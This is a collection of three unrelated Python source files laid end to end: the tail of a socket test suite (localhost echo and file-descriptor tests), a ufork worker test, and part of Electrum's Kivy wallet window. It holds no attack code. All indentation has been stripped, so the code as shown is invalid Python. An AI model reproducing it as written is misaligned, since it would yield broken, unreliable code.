sock.connect(addr)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
def test_tcp4(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port)) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_tcp6(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port),
family=socket.AF_INET6) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
# --- dual stack tests
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v4(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v6(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
@requireAttrs(socket, "send_fds")
@requireAttrs(socket, "recv_fds")
@requireAttrs(socket, "AF_UNIX")
class SendRecvFdsTests(unittest.TestCase):
def testSendAndRecvFds(self):
def close_pipes(pipes):
for fd1, fd2 in pipes:
os.close(fd1)
os.close(fd2)
def close_fds(fds):
for fd in fds:
os.close(fd)
# send 10 file descriptors
pipes = [os.pipe() for _ in range(10)]
self.addCleanup(close_pipes, pipes)
fds = [rfd for rfd, wfd in pipes]
# use a UNIX socket pair to exchange file descriptors locally
sock1, sock2 = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
with sock1, sock2:
socket.send_fds(sock1, [MSG], fds)
# request more data and file descriptors than expected
msg, fds2, flags, addr = socket.recv_fds(sock2, len(MSG) * 2, len(fds) * 2)
self.addCleanup(close_fds, fds2)
self.assertEqual(msg, MSG)
self.assertEqual(len(fds2), len(fds))
self.assertEqual(flags, 0)
# don't test addr
# test that file descriptors are connected
for index, fds in enumerate(pipes):
rfd, wfd = fds
os.write(wfd, str(index).encode())
for index, rfd in enumerate(fds2):
data = os.read(rfd, 100)
self.assertEqual(data, str(index).encode())
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest,
UDPTimeoutTest, CreateServerTest, CreateServerFunctionalTest,
SendRecvFdsTests]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(LinuxKernelCryptoAPI)
tests.append(BasicQIPCRTRTest)
tests.extend([
BasicVSOCKTest,
ThreadedVSOCKSocketStreamTest,
])
tests.append(BasicBluetoothTest)
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgUDPLITETest,
RecvmsgUDPLITETest,
RecvmsgIntoUDPLITETest,
SendmsgUDPLITE6Test,
RecvmsgUDPLITE6Test,
RecvmsgRFC3542AncillaryUDPLITE6Test,
RecvmsgIntoRFC3542AncillaryUDPLITE6Test,
RecvmsgIntoUDPLITE6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
tests.append(TestMSWindowsTCPFlags)
thread_info = threading_helper.threading_setup()
support.run_unittest(*tests)
threading_helper.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
test_worker.py
|
from __future__ import absolute_import
import sys
import time
import threading
try:
import _thread as thread
except ImportError:
import thread # py3
from tests.utils import check_leaked_workers
from ufork import Arbiter
def suicide_worker():
def die_soon():
time.sleep(2)
thread.interrupt_main() # sys.exit(0)
suicide_thread = threading.Thread(target=die_soon)
suicide_thread.daemon = True
suicide_thread.start()
def test_worker_cycle_test():
arbiter = Arbiter(post_fork=suicide_worker)
arbiter_thread = threading.Thread(target=arbiter.run, kwargs={"repl": False})
arbiter_thread.daemon = True
arbiter_thread.start()
time.sleep(6) # give some time for workers to die
arbiter.stopping = True
arbiter_thread.join()
time.sleep(1) # give OS a chance to finish killing all child workers
assert arbiter.dead_workers
check_leaked_workers(arbiter)
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
from electrum.bitcoin import TYPE_ADDRESS
from electrum.storage import WalletStorage
from electrum.wallet import Wallet, InternalAddressCorruption
from electrum.paymentrequest import InvoiceStore
from electrum.util import profiler, InvalidPassword, send_exception_to_crash_reporter
from electrum.plugin import run_hook
from electrum.util import format_satoshis, format_satoshis_plain
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from electrum import blockchain
from electrum.network import Network
from .i18n import _
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (base_units, NoDynamicFeeEstimates, decimal_point_to_base_unit_name,
base_unit_name_to_decimal_point, NotEnoughFunds, UnknownBaseUnit,
DECIMAL_POINT_DEFAULT)
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum import constants
pp = servers.get(host, constants.net.DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def _get_bu(self):
decimal_point = self.electrum_config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
return decimal_point_to_base_unit_name(decimal_point)
except UnknownBaseUnit:
return decimal_point_to_base_unit_name(DECIMAL_POINT_DEFAULT)
def _set_bu(self, value):
assert value in base_units.keys()
decimal_point = base_unit_name_to_decimal_point(value)
self.electrum_config.set_key('decimal_point', decimal_point, True)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
self.pause_time = 0
App.__init__(self)#, **kwargs)
title = _('Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.host
self.server_port = net_params.port
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def on_pr(self, pr):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, on_qr_failure)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_fee_histogram, ['fee_histogram'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, wallet):
if wallet: # wizard returned a wallet
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(), ask_if_wizard=True)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
self.password_dialog(wallet, _('Enter PIN code'), lambda x: self.load_wallet(wallet), self.stop)
else:
self.load_wallet(wallet)
else:
def launch_wizard():
storage = WalletStorage(path, manual_upgrades=True)
wizard = Factory.InstallWizard(self.electrum_config, self.plugins, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
if not ask_if_wizard:
launch_wizard()
else:
from .uix.dialogs.question import Question
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
if self.wallet:
self.electrum_config.save_last_wallet(self.wallet)
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging")
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def get_max_amount(self):
from electrum.transaction import TxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
if not inputs:
return ''
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [TxOutput(TYPE_ADDRESS, addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 60:
self.password_dialog(self.wallet, _('Enter PIN'), None, self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
